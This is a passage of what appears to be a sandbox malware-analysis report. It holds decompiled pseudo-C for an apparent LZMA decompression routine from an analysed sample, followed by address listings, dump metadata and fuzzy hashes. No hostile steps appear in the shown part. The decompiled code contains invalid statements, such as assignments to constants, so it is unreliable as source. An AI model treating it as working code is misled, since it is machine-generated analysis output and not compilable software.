                  											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                  											L148:
                  											_t487 = __ebp - 0x48;
                  											 *_t487 =  *(__ebp - 0x48) - 1;
                  											__eflags =  *_t487;
                  											goto L149;
                  										case 0x19:
                  											__eflags = __ebx - 4;
                  											if(__ebx < 4) {
                  												 *(__ebp - 0x2c) = __ebx;
                  												L120:
                  												_t394 = __ebp - 0x2c;
                  												 *_t394 =  *(__ebp - 0x2c) + 1;
                  												__eflags =  *_t394;
                  												L121:
                  												__eax =  *(__ebp - 0x2c);
                  												__eflags = __eax;
                  												if(__eax == 0) {
                  													 *(__ebp - 0x30) =  *(__ebp - 0x30) | 0xffffffff;
                  													goto L170;
                  												}
                  												__eflags = __eax -  *(__ebp - 0x60);
                  												if(__eax >  *(__ebp - 0x60)) {
                  													goto L171;
                  												}
                  												 *(__ebp - 0x30) =  *(__ebp - 0x30) + 2;
                  												__eax =  *(__ebp - 0x30);
                  												_t401 = __ebp - 0x60;
                  												 *_t401 =  *(__ebp - 0x60) +  *(__ebp - 0x30);
                  												__eflags =  *_t401;
                  												goto L124;
                  											}
                  											__ecx = __ebx;
                  											__eax = __ebx;
                  											__ecx = __ebx >> 1;
                  											__eax = __ebx & 0x00000001;
                  											__ecx = (__ebx >> 1) - 1;
                  											__al = __al | 0x00000002;
                  											__eax = (__ebx & 0x00000001) << __cl;
                  											__eflags = __ebx - 0xe;
                  											 *(__ebp - 0x2c) = __eax;
                  											if(__ebx >= 0xe) {
                  												__ebx = 0;
                  												 *(__ebp - 0x48) = __ecx;
                  												L103:
                  												__eflags =  *(__ebp - 0x48);
                  												if( *(__ebp - 0x48) <= 0) {
                  													__eax = __eax + __ebx;
                  													 *(__ebp - 0x40) = 4;
                  													 *(__ebp - 0x2c) = __eax;
                  													__eax =  *(__ebp - 4);
                  													__eax =  *(__ebp - 4) + 0x644;
                  													__eflags = __eax;
                  													L109:
                  													__ebx = 0;
                  													 *(__ebp - 0x58) = __eax;
                  													 *(__ebp - 0x50) = 1;
                  													 *(__ebp - 0x44) = 0;
                  													 *(__ebp - 0x48) = 0;
                  													L113:
                  													__eax =  *(__ebp - 0x40);
                  													__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
                  													if( *(__ebp - 0x48) >=  *(__ebp - 0x40)) {
                  														_t392 = __ebp - 0x2c;
                  														 *_t392 =  *(__ebp - 0x2c) + __ebx;
                  														__eflags =  *_t392;
                  														goto L120;
                  													}
                  													__eax =  *(__ebp - 0x50);
                  													 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
                  													__edi =  *(__ebp - 0x50) +  *(__ebp - 0x50);
                  													__eax =  *(__ebp - 0x58);
                  													__esi = __edi + __eax;
                  													 *(__ebp - 0x54) = __esi;
                  													__ax =  *__esi;
                  													__ecx = __ax & 0x0000ffff;
                  													__edx = ( *(__ebp - 0x10) >> 0xb) * __ecx;
                  													__eflags =  *(__ebp - 0xc) - __edx;
                  													if( *(__ebp - 0xc) >= __edx) {
                  														__ecx = 0;
                  														 *(__ebp - 0x10) =  *(__ebp - 0x10) - __edx;
                  														__ecx = 1;
                  														 *(__ebp - 0xc) =  *(__ebp - 0xc) - __edx;
                  														__ebx = 1;
                  														__ecx =  *(__ebp - 0x48);
                  														__ebx = 1 << __cl;
                  														__ecx = 1 << __cl;
                  														__ebx =  *(__ebp - 0x44);
                  														__ebx =  *(__ebp - 0x44) | __ecx;
                  														__cx = __ax;
                  														__cx = __ax >> 5;
                  														__eax = __eax - __ecx;
                  														__edi = __edi + 1;
                  														__eflags = __edi;
                  														 *(__ebp - 0x44) = __ebx;
                  														 *__esi = __ax;
                  														 *(__ebp - 0x50) = __edi;
                  													} else {
                  														 *(__ebp - 0x10) = __edx;
                  														0x800 = 0x800 - __ecx;
                  														0x800 - __ecx >> 5 = (0x800 - __ecx >> 5) + __eax;
                  														 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
                  														 *__esi = __dx;
                  													}
                  													__eflags =  *(__ebp - 0x10) - 0x1000000;
                  													if( *(__ebp - 0x10) >= 0x1000000) {
                  														L112:
                  														_t369 = __ebp - 0x48;
                  														 *_t369 =  *(__ebp - 0x48) + 1;
                  														__eflags =  *_t369;
                  														goto L113;
                  													} else {
                  														goto L110;
                  													}
                  												}
                  												__ecx =  *(__ebp - 0xc);
                  												__ebx = __ebx + __ebx;
                  												 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 1;
                  												__eflags =  *(__ebp - 0xc) -  *(__ebp - 0x10);
                  												 *(__ebp - 0x44) = __ebx;
                  												if( *(__ebp - 0xc) >=  *(__ebp - 0x10)) {
                  													__ecx =  *(__ebp - 0x10);
                  													 *(__ebp - 0xc) =  *(__ebp - 0xc) -  *(__ebp - 0x10);
                  													__ebx = __ebx | 0x00000001;
                  													__eflags = __ebx;
                  													 *(__ebp - 0x44) = __ebx;
                  												}
                  												__eflags =  *(__ebp - 0x10) - 0x1000000;
                  												if( *(__ebp - 0x10) >= 0x1000000) {
                  													L102:
                  													_t339 = __ebp - 0x48;
                  													 *_t339 =  *(__ebp - 0x48) - 1;
                  													__eflags =  *_t339;
                  													goto L103;
                  												} else {
                  													goto L100;
                  												}
                  											}
                  											__edx =  *(__ebp - 4);
                  											__eax = __eax - __ebx;
                  											 *(__ebp - 0x40) = __ecx;
                  											__eax =  *(__ebp - 4) + 0x55e + __eax * 2;
                  											goto L109;
                  										case 0x1a:
                  											L56:
                  											__eflags =  *(__ebp - 0x64);
                  											if( *(__ebp - 0x64) == 0) {
                  												 *(__ebp - 0x88) = 0x1a;
                  												goto L170;
                  											}
                  											__ecx =  *(__ebp - 0x68);
                  											__al =  *(__ebp - 0x5c);
                  											__edx =  *(__ebp - 8);
                  											 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
                  											 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
                  											 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
                  											 *( *(__ebp - 0x68)) = __al;
                  											__ecx =  *(__ebp - 0x14);
                  											 *(__ecx +  *(__ebp - 8)) = __al;
                  											__eax = __ecx + 1;
                  											__edx = 0;
                  											_t192 = __eax %  *(__ebp - 0x74);
                  											__eax = __eax /  *(__ebp - 0x74);
                  											__edx = _t192;
                  											goto L80;
                  										case 0x1b:
                  											L76:
                  											__eflags =  *(__ebp - 0x64);
                  											if( *(__ebp - 0x64) == 0) {
                  												 *(__ebp - 0x88) = 0x1b;
                  												goto L170;
                  											}
                  											__eax =  *(__ebp - 0x14);
                  											__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
                  											__eflags = __eax -  *(__ebp - 0x74);
                  											if(__eax >=  *(__ebp - 0x74)) {
                  												__eax = __eax +  *(__ebp - 0x74);
                  												__eflags = __eax;
                  											}
                  											__edx =  *(__ebp - 8);
                  											__cl =  *(__eax + __edx);
                  											__eax =  *(__ebp - 0x14);
                  											 *(__ebp - 0x5c) = __cl;
                  											 *(__eax + __edx) = __cl;
                  											__eax = __eax + 1;
                  											__edx = 0;
                  											_t275 = __eax %  *(__ebp - 0x74);
                  											__eax = __eax /  *(__ebp - 0x74);
                  											__edx = _t275;
                  											__eax =  *(__ebp - 0x68);
                  											 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
                  											 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
                  											_t284 = __ebp - 0x64;
                  											 *_t284 =  *(__ebp - 0x64) - 1;
                  											__eflags =  *_t284;
                  											 *( *(__ebp - 0x68)) = __cl;
                  											L80:
                  											 *(__ebp - 0x14) = __edx;
                  											goto L81;
                  										case 0x1c:
                  											while(1) {
                  												L124:
                  												__eflags =  *(__ebp - 0x64);
                  												if( *(__ebp - 0x64) == 0) {
                  													break;
                  												}
                  												__eax =  *(__ebp - 0x14);
                  												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
                  												__eflags = __eax -  *(__ebp - 0x74);
                  												if(__eax >=  *(__ebp - 0x74)) {
                  													__eax = __eax +  *(__ebp - 0x74);
                  													__eflags = __eax;
                  												}
                  												__edx =  *(__ebp - 8);
                  												__cl =  *(__eax + __edx);
                  												__eax =  *(__ebp - 0x14);
                  												 *(__ebp - 0x5c) = __cl;
                  												 *(__eax + __edx) = __cl;
                  												__eax = __eax + 1;
                  												__edx = 0;
                  												_t415 = __eax %  *(__ebp - 0x74);
                  												__eax = __eax /  *(__ebp - 0x74);
                  												__edx = _t415;
                  												__eax =  *(__ebp - 0x68);
                  												 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
                  												 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
                  												 *(__ebp - 0x30) =  *(__ebp - 0x30) - 1;
                  												__eflags =  *(__ebp - 0x30);
                  												 *( *(__ebp - 0x68)) = __cl;
                  												 *(__ebp - 0x14) = _t415;
                  												if( *(__ebp - 0x30) > 0) {
                  													continue;
                  												} else {
                  													L81:
                  													 *(__ebp - 0x88) = 2;
                  													goto L1;
                  												}
                  											}
                  											 *(__ebp - 0x88) = 0x1c;
                  											L170:
                  											_push(0x22);
                  											_pop(_t567);
                  											memcpy( *(_t612 - 0x90), _t612 - 0x88, _t567 << 2);
                  											_t535 = 0;
                  											L172:
                  											return _t535;
                  									}
                  								}
                  								L171:
                  								_t535 = _t534 | 0xffffffff;
                  								goto L172;
                  							}
                  						}
                  						__eax =  *(__ebp - 0x50);
                  						 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
                  						__edx =  *(__ebp - 0x50) +  *(__ebp - 0x50);
                  						__eax =  *(__ebp - 0x58);
                  						__esi = __edx + __eax;
                  						 *(__ebp - 0x54) = __esi;
                  						__ax =  *__esi;
                  						__edi = __ax & 0x0000ffff;
                  						__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
                  						if( *(__ebp - 0xc) >= __ecx) {
                  							 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                  							 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                  							__cx = __ax;
                  							__cx = __ax >> 5;
                  							__eax = __eax - __ecx;
                  							__edx = __edx + 1;
                  							 *__esi = __ax;
                  							 *(__ebp - 0x50) = __edx;
                  						} else {
                  							 *(__ebp - 0x10) = __ecx;
                  							0x800 = 0x800 - __edi;
                  							0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                  							 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
                  							 *__esi = __cx;
                  						}
                  						if( *(__ebp - 0x10) >= 0x1000000) {
                  							goto L148;
                  						} else {
                  							goto L146;
                  						}
                  					}
                  					goto L1;
                  				}
                  			}








                  0x0040631d
                  0x00406320
                  0x00406323
                  0x00406326
                  0x00406328
                  0x0040632f
                  0x00406330
                  0x00406332
                  0x00406335
                  0x00406338
                  0x0040633b
                  0x0040633b
                  0x00406340
                  0x00000000
                  0x00406340
                  0x004062f1
                  0x004062f4
                  0x004062f7
                  0x00406301
                  0x00000000
                  0x00000000
                  0x00406355
                  0x00406359
                  0x0040637c
                  0x0040637f
                  0x00406382
                  0x0040638c
                  0x0040635b
                  0x0040635b
                  0x0040635e
                  0x00406361
                  0x00406364
                  0x00406371
                  0x00406374
                  0x00406374
                  0x00000000
                  0x00000000
                  0x00406398
                  0x0040639c
                  0x00000000
                  0x00000000
                  0x004063a2
                  0x004063a6
                  0x00000000
                  0x00000000
                  0x004063ac
                  0x004063ae
                  0x004063b2
                  0x004063b2
                  0x004063b5
                  0x004063b9
                  0x00000000
                  0x00000000
                  0x00406409
                  0x0040640d
                  0x00406414
                  0x00406417
                  0x0040641a
                  0x00406424
                  0x00000000
                  0x00406424
                  0x0040640f
                  0x00000000
                  0x00000000
                  0x00406430
                  0x00406434
                  0x0040643b
                  0x0040643e
                  0x00406441
                  0x00406436
                  0x00406436
                  0x00406436
                  0x00406444
                  0x00406447
                  0x0040644a
                  0x0040644a
                  0x0040644d
                  0x00406450
                  0x00406453
                  0x00406453
                  0x00406456
                  0x0040645d
                  0x00406462
                  0x00000000
                  0x00000000
                  0x004064f0
                  0x004064f0
                  0x004064f4
                  0x00406892
                  0x00000000
                  0x00406892
                  0x004064fa
                  0x004064fd
                  0x00406500
                  0x00406504
                  0x00406507
                  0x0040650d
                  0x0040650f
                  0x0040650f
                  0x0040650f
                  0x00406512
                  0x00406515
                  0x00000000
                  0x00000000
                  0x004060e5
                  0x004060e5
                  0x004060e9
                  0x00406856
                  0x00000000
                  0x00406856
                  0x004060ef
                  0x004060f2
                  0x004060f5
                  0x004060f9
                  0x004060fc
                  0x00406102
                  0x00406104
                  0x00406104
                  0x00406104
                  0x00406107
                  0x0040610a
                  0x0040610a
                  0x0040610d
                  0x00406110
                  0x00000000
                  0x00000000
                  0x00406116
                  0x0040611c
                  0x00000000
                  0x00000000
                  0x00406122
                  0x00406122
                  0x00406126
                  0x00406129
                  0x0040612c
                  0x0040612f
                  0x00406132
                  0x00406133
                  0x00406136
                  0x00406138
                  0x0040613e
                  0x00406141
                  0x00406144
                  0x00406147
                  0x0040614a
                  0x0040614d
                  0x00406150
                  0x0040616c
                  0x0040616f
                  0x00406172
                  0x00406175
                  0x0040617c
                  0x00406180
                  0x00406182
                  0x00406186
                  0x00406152
                  0x00406152
                  0x00406156
                  0x0040615e
                  0x00406163
                  0x00406165
                  0x00406167
                  0x00406167
                  0x00406189
                  0x00406190
                  0x00406193
                  0x00000000
                  0x00406199
                  0x00000000
                  0x00406199
                  0x00000000
                  0x0040619e
                  0x0040619e
                  0x004061a2
                  0x00406862
                  0x00000000
                  0x00406862
                  0x004061a8
                  0x004061ab
                  0x004061ae
                  0x004061b2
                  0x004061b5
                  0x004061bb
                  0x004061bd
                  0x004061bd
                  0x004061bd
                  0x004061c0
                  0x004061c3
                  0x004061c3
                  0x004061c3
                  0x004061c9
                  0x00000000
                  0x00000000
                  0x004061cb
                  0x004061ce
                  0x004061d1
                  0x004061d4
                  0x004061d7
                  0x004061da
                  0x004061dd
                  0x004061e0
                  0x004061e3
                  0x004061e6
                  0x004061e9
                  0x00406201
                  0x00406204
                  0x00406207
                  0x0040620a
                  0x0040620a
                  0x0040620d
                  0x00406211
                  0x00406213
                  0x004061eb
                  0x004061eb
                  0x004061f3
                  0x004061f8
                  0x004061fa
                  0x004061fc
                  0x004061fc
                  0x00406216
                  0x0040621d
                  0x00406220
                  0x00000000
                  0x00406222
                  0x00000000
                  0x00406222
                  0x00406220
                  0x00406227
                  0x00406227
                  0x00406227
                  0x00406227
                  0x00000000
                  0x00000000
                  0x00406262
                  0x00406262
                  0x00406266
                  0x0040686e
                  0x00000000
                  0x0040686e
                  0x0040626c
                  0x0040626f
                  0x00406272
                  0x00406276
                  0x00406279
                  0x0040627f
                  0x00406281
                  0x00406281
                  0x00406281
                  0x00406284
                  0x00406287
                  0x00406287
                  0x0040628d
                  0x0040622b
                  0x0040622b
                  0x0040622e
                  0x00000000
                  0x0040622e
                  0x0040628f
                  0x0040628f
                  0x00406292
                  0x00406295
                  0x00406298
                  0x0040629b
                  0x0040629e
                  0x004062a1
                  0x004062a4
                  0x004062a7
                  0x004062aa
                  0x004062ad
                  0x004062c5
                  0x004062c8
                  0x004062cb
                  0x004062ce
                  0x004062ce
                  0x004062d1
                  0x004062d5
                  0x004062d7
                  0x004062af
                  0x004062af
                  0x004062b7
                  0x004062bc
                  0x004062be
                  0x004062c0
                  0x004062c0
                  0x004062da
                  0x004062e1
                  0x004062e4
                  0x00000000
                  0x004062e6
                  0x00000000
                  0x004062e6
                  0x00000000
                  0x00406573
                  0x00406573
                  0x00406577
                  0x0040689e
                  0x00000000
                  0x0040689e
                  0x0040657d
                  0x00406580
                  0x00406583
                  0x00406587
                  0x0040658a
                  0x00406590
                  0x00406592
                  0x00406592
                  0x00406592
                  0x00406595
                  0x00000000
                  0x00000000
                  0x00406343
                  0x00406343
                  0x00406346
                  0x004066b8
                  0x004066b8
                  0x00000000
                  0x00000000
                  0x00000000
                  0x00000000
                  0x0040673f
                  0x00406743
                  0x00406761
                  0x00406761
                  0x00406761
                  0x00406768
                  0x0040676f
                  0x00000000
                  0x0040676f
                  0x00406745
                  0x00406748
                  0x0040674b
                  0x0040674e
                  0x00406755
                  0x00000000
                  0x00000000
                  0x00406830
                  0x00406833
                  0x00406734
                  0x00406734
                  0x00000000
                  0x00000000
                  0x0040646a
                  0x0040646c
                  0x00406473
                  0x00406474
                  0x00406476
                  0x00406479
                  0x00000000
                  0x00000000
                  0x00406481
                  0x00406484
                  0x00406487
                  0x00406489
                  0x0040648b
                  0x0040648b
                  0x0040648c
                  0x0040648f
                  0x00406496
                  0x00406499
                  0x004064a7
                  0x00000000
                  0x00000000
                  0x00000000
                  0x00000000
                  0x0040678c
                  0x0040678c
                  0x00406790
                  0x004068c8
                  0x00000000
                  0x004068c8
                  0x00406796
                  0x00406799
                  0x0040679c
                  0x004067a0
                  0x004067a3
                  0x004067a9
                  0x004067ab
                  0x004067ab
                  0x004067ab
                  0x004067ae
                  0x004067b1
                  0x004067b1
                  0x004067b1
                  0x004067b1
                  0x00000000
                  0x00000000
                  0x004064af
                  0x004064b2
                  0x004064e8
                  0x00406618
                  0x00406618
                  0x00406618
                  0x00406618
                  0x0040661b
                  0x0040661b
                  0x0040661e
                  0x00406620
                  0x004068aa
                  0x00000000
                  0x004068aa
                  0x00406626
                  0x00406629
                  0x00000000
                  0x00000000
                  0x0040662f
                  0x00406633
                  0x00406636
                  0x00406636
                  0x00406636
                  0x00000000
                  0x00406636
                  0x004064b4
                  0x004064b6
                  0x004064b8
                  0x004064ba
                  0x004064bd
                  0x004064be
                  0x004064c0
                  0x004064c2
                  0x004064c5
                  0x004064c8
                  0x004064de
                  0x004064e3
                  0x0040651b
                  0x0040651b
                  0x0040651f
                  0x0040654b
                  0x0040654d
                  0x00406554
                  0x00406557
                  0x0040655a
                  0x0040655a
                  0x0040655f
                  0x0040655f
                  0x00406561
                  0x00406564
                  0x0040656b
                  0x0040656e
                  0x0040659b
                  0x0040659b
                  0x0040659e
                  0x004065a1
                  0x00406615
                  0x00406615
                  0x00406615
                  0x00000000
                  0x00406615
                  0x004065a3
                  0x004065a9
                  0x004065ac
                  0x004065af
                  0x004065b2
                  0x004065b5
                  0x004065b8
                  0x004065bb
                  0x004065be
                  0x004065c1
                  0x004065c4
                  0x004065dd
                  0x004065df
                  0x004065e2
                  0x004065e3
                  0x004065e6
                  0x004065e8
                  0x004065eb
                  0x004065ed
                  0x004065ef
                  0x004065f2
                  0x004065f4
                  0x004065f7
                  0x004065fb
                  0x004065fd
                  0x004065fd
                  0x004065fe
                  0x00406601
                  0x00406604
                  0x004065c6
                  0x004065c6
                  0x004065ce
                  0x004065d3
                  0x004065d5
                  0x004065d8
                  0x004065d8
                  0x00406607
                  0x0040660e
                  0x00406598
                  0x00406598
                  0x00406598
                  0x00406598
                  0x00000000
                  0x00406610
                  0x00000000
                  0x00406610
                  0x0040660e
                  0x00406521
                  0x00406524
                  0x00406526
                  0x00406529
                  0x0040652c
                  0x0040652f
                  0x00406531
                  0x00406534
                  0x00406537
                  0x00406537
                  0x0040653a
                  0x0040653a
                  0x0040653d
                  0x00406544
                  0x00406518
                  0x00406518
                  0x00406518
                  0x00406518
                  0x00000000
                  0x00406546
                  0x00000000
                  0x00406546
                  0x00406544
                  0x004064ca
                  0x004064cd
                  0x004064cf
                  0x004064d2
                  0x00000000
                  0x00000000
                  0x00406231
                  0x00406231
                  0x00406235
                  0x0040687a
                  0x00000000
                  0x0040687a
                  0x0040623b
                  0x0040623e
                  0x00406241
                  0x00406244
                  0x00406247
                  0x0040624a
                  0x0040624d
                  0x0040624f
                  0x00406252
                  0x00406255
                  0x00406258
                  0x0040625a
                  0x0040625a
                  0x0040625a
                  0x00000000
                  0x00000000
                  0x004063bc
                  0x004063bc
                  0x004063c0
                  0x00406886
                  0x00000000
                  0x00406886
                  0x004063c6
                  0x004063c9
                  0x004063cc
                  0x004063cf
                  0x004063d1
                  0x004063d1
                  0x004063d1
                  0x004063d4
                  0x004063d7
                  0x004063da
                  0x004063dd
                  0x004063e0
                  0x004063e3
                  0x004063e4
                  0x004063e6
                  0x004063e6
                  0x004063e6
                  0x004063e9
                  0x004063ec
                  0x004063ef
                  0x004063f2
                  0x004063f2
                  0x004063f2
                  0x004063f5
                  0x004063f7
                  0x004063f7
                  0x00000000
                  0x00000000
                  0x00406639
                  0x00406639
                  0x00406639
                  0x0040663d
                  0x00000000
                  0x00000000
                  0x00406643
                  0x00406646
                  0x00406649
                  0x0040664c
                  0x0040664e
                  0x0040664e
                  0x0040664e
                  0x00406651
                  0x00406654
                  0x00406657
                  0x0040665a
                  0x0040665d
                  0x00406660
                  0x00406661
                  0x00406663
                  0x00406663
                  0x00406663
                  0x00406666
                  0x00406669
                  0x0040666c
                  0x0040666f
                  0x00406672
                  0x00406676
                  0x00406678
                  0x0040667b
                  0x00000000
                  0x0040667d
                  0x004063fa
                  0x004063fa
                  0x00000000
                  0x004063fa
                  0x0040667b
                  0x004068b0
                  0x004068d2
                  0x004068d8
                  0x004068da
                  0x004068e1
                  0x004068e3
                  0x004068ea
                  0x004068ee
                  0x00000000
                  0x00405edf
                  0x004068e7
                  0x004068e7
                  0x00000000
                  0x004068e7
                  0x00406734
                  0x004067ba
                  0x004067c0
                  0x004067c3
                  0x004067c6
                  0x004067c9
                  0x004067cc
                  0x004067cf
                  0x004067d2
                  0x004067d5
                  0x004067db
                  0x004067f4
                  0x004067f7
                  0x004067fa
                  0x004067fd
                  0x00406801
                  0x00406803
                  0x00406804
                  0x00406807
                  0x004067dd
                  0x004067dd
                  0x004067e5
                  0x004067ea
                  0x004067ec
                  0x004067ef
                  0x004067ef
                  0x00406811
                  0x00000000
                  0x00406813
                  0x00000000
                  0x00406813
                  0x00406811
                  0x00000000
                  0x00406686

                  Memory Dump Source
                  • Source File: 00000000.00000002.351761699.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.351737055.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.351795030.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.351815930.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.351857358.0000000000422000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.351889394.0000000000429000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.351940694.000000000042C000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_kVijllv0Yl.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 62cf5b17206a6db47431eecf79a6a82934569840bddaea447bb47edb6382e710
                  • Instruction ID: bb8ed6064adbc6ac752208bd1780db284a58169b415d1e5229999a4f541ad509
                  • Opcode Fuzzy Hash: 62cf5b17206a6db47431eecf79a6a82934569840bddaea447bb47edb6382e710
                  • Instruction Fuzzy Hash: 11912271D00229CBDF28CF98C854BADBBB1FB44305F15816AD816BB291C7789A96DF44
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 98%
                  			E00406398() {
                  				unsigned short _t532;
                  				signed int _t533;
                  				void _t534;
                  				void* _t535;
                  				signed int _t536;
                  				signed int _t565;
                  				signed int _t568;
                  				signed int _t589;
                  				signed int* _t606;
                  				void* _t613;
                  
                  				L0:
                  				while(1) {
                  					L0:
                  					if( *(_t613 - 0x40) != 0) {
                  						L89:
                  						 *((intOrPtr*)(_t613 - 0x80)) = 0x15;
                  						 *(_t613 - 0x58) =  *(_t613 - 4) + 0xa68;
                  						L69:
                  						_t606 =  *(_t613 - 0x58);
                  						 *(_t613 - 0x84) = 0x12;
                  						L132:
                  						 *(_t613 - 0x54) = _t606;
                  						L133:
                  						_t532 =  *_t606;
                  						_t589 = _t532 & 0x0000ffff;
                  						_t565 = ( *(_t613 - 0x10) >> 0xb) * _t589;
                  						if( *(_t613 - 0xc) >= _t565) {
                  							 *(_t613 - 0x10) =  *(_t613 - 0x10) - _t565;
                  							 *(_t613 - 0xc) =  *(_t613 - 0xc) - _t565;
                  							 *(_t613 - 0x40) = 1;
                  							_t533 = _t532 - (_t532 >> 5);
                  							 *_t606 = _t533;
                  						} else {
                  							 *(_t613 - 0x10) = _t565;
                  							 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
                  							 *_t606 = (0x800 - _t589 >> 5) + _t532;
                  						}
                  						if( *(_t613 - 0x10) >= 0x1000000) {
                  							L139:
                  							_t534 =  *(_t613 - 0x84);
                  							L140:
                  							 *(_t613 - 0x88) = _t534;
                  							goto L1;
                  						} else {
                  							L137:
                  							if( *(_t613 - 0x6c) == 0) {
                  								 *(_t613 - 0x88) = 5;
                  								goto L170;
                  							}
                  							 *(_t613 - 0x10) =  *(_t613 - 0x10) << 8;
                  							 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
                  							 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
                  							 *(_t613 - 0xc) =  *(_t613 - 0xc) << 0x00000008 |  *( *(_t613 - 0x70)) & 0x000000ff;
                  							goto L139;
                  						}
                  					} else {
                  						if( *(__ebp - 0x60) == 0) {
                  							L171:
                  							_t536 = _t535 | 0xffffffff;
                  							L172:
                  							return _t536;
                  						}
                  						__eax = 0;
                  						_t258 =  *(__ebp - 0x38) - 7 >= 0;
                  						0 | _t258 = _t258 + _t258 + 9;
                  						 *(__ebp - 0x38) = _t258 + _t258 + 9;
                  						L75:
                  						if( *(__ebp - 0x64) == 0) {
                  							 *(__ebp - 0x88) = 0x1b;
                  							L170:
                  							_t568 = 0x22;
                  							memcpy( *(_t613 - 0x90), _t613 - 0x88, _t568 << 2);
                  							_t536 = 0;
                  							goto L172;
                  						}
                  						__eax =  *(__ebp - 0x14);
                  						__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
                  						if(__eax >=  *(__ebp - 0x74)) {
                  							__eax = __eax +  *(__ebp - 0x74);
                  						}
                  						__edx =  *(__ebp - 8);
                  						__cl =  *(__eax + __edx);
                  						__eax =  *(__ebp - 0x14);
                  						 *(__ebp - 0x5c) = __cl;
                  						 *(__eax + __edx) = __cl;
                  						__eax = __eax + 1;
                  						__edx = 0;
                  						_t274 = __eax %  *(__ebp - 0x74);
                  						__eax = __eax /  *(__ebp - 0x74);
                  						__edx = _t274;
                  						__eax =  *(__ebp - 0x68);
                  						 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
                  						 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
                  						_t283 = __ebp - 0x64;
                  						 *_t283 =  *(__ebp - 0x64) - 1;
                  						 *( *(__ebp - 0x68)) = __cl;
                  						L79:
                  						 *(__ebp - 0x14) = __edx;
                  						L80:
                  						 *(__ebp - 0x88) = 2;
                  					}
                  					L1:
                  					_t535 =  *(_t613 - 0x88);
                  					if(_t535 > 0x1c) {
                  						goto L171;
                  					}
                  					switch( *((intOrPtr*)(_t535 * 4 +  &M004068EF))) {
                  						case 0:
                  							if( *(_t613 - 0x6c) == 0) {
                  								goto L170;
                  							}
                  							 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
                  							 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
                  							_t535 =  *( *(_t613 - 0x70));
                  							if(_t535 > 0xe1) {
                  								goto L171;
                  							}
                  							_t539 = _t535 & 0x000000ff;
                  							_push(0x2d);
                  							asm("cdq");
                  							_pop(_t570);
                  							_push(9);
                  							_pop(_t571);
                  							_t609 = _t539 / _t570;
                  							_t541 = _t539 % _t570 & 0x000000ff;
                  							asm("cdq");
                  							_t604 = _t541 % _t571 & 0x000000ff;
                  							 *(_t613 - 0x3c) = _t604;
                  							 *(_t613 - 0x1c) = (1 << _t609) - 1;
                  							 *((intOrPtr*)(_t613 - 0x18)) = (1 << _t541 / _t571) - 1;
                  							_t612 = (0x300 << _t604 + _t609) + 0x736;
                  							if(0x600 ==  *((intOrPtr*)(_t613 - 0x78))) {
                  								L10:
                  								if(_t612 == 0) {
                  									L12:
                  									 *(_t613 - 0x48) =  *(_t613 - 0x48) & 0x00000000;
                  									 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
                  									goto L15;
                  								} else {
                  									goto L11;
                  								}
                  								do {
                  									L11:
                  									_t612 = _t612 - 1;
                  									 *((short*)( *(_t613 - 4) + _t612 * 2)) = 0x400;
                  								} while (_t612 != 0);
                  								goto L12;
                  							}
                  							if( *(_t613 - 4) != 0) {
                  								GlobalFree( *(_t613 - 4));
                  							}
                  							_t535 = GlobalAlloc(0x40, 0x600); // executed
                  							 *(_t613 - 4) = _t535;
                  							if(_t535 == 0) {
                  								goto L171;
                  							} else {
                  								 *((intOrPtr*)(_t613 - 0x78)) = 0x600;
                  								goto L10;
                  							}
                  						case 1:
                  							L13:
                  							__eflags =  *(_t613 - 0x6c);
                  							if( *(_t613 - 0x6c) == 0) {
                  								 *(_t613 - 0x88) = 1;
                  								goto L170;
                  							}
                  							 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
                  							 *(_t613 - 0x40) =  *(_t613 - 0x40) | ( *( *(_t613 - 0x70)) & 0x000000ff) <<  *(_t613 - 0x48) << 0x00000003;
                  							 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
                  							_t45 = _t613 - 0x48;
                  							 *_t45 =  *(_t613 - 0x48) + 1;
                  							__eflags =  *_t45;
                  							L15:
                  							if( *(_t613 - 0x48) < 4) {
                  								goto L13;
                  							}
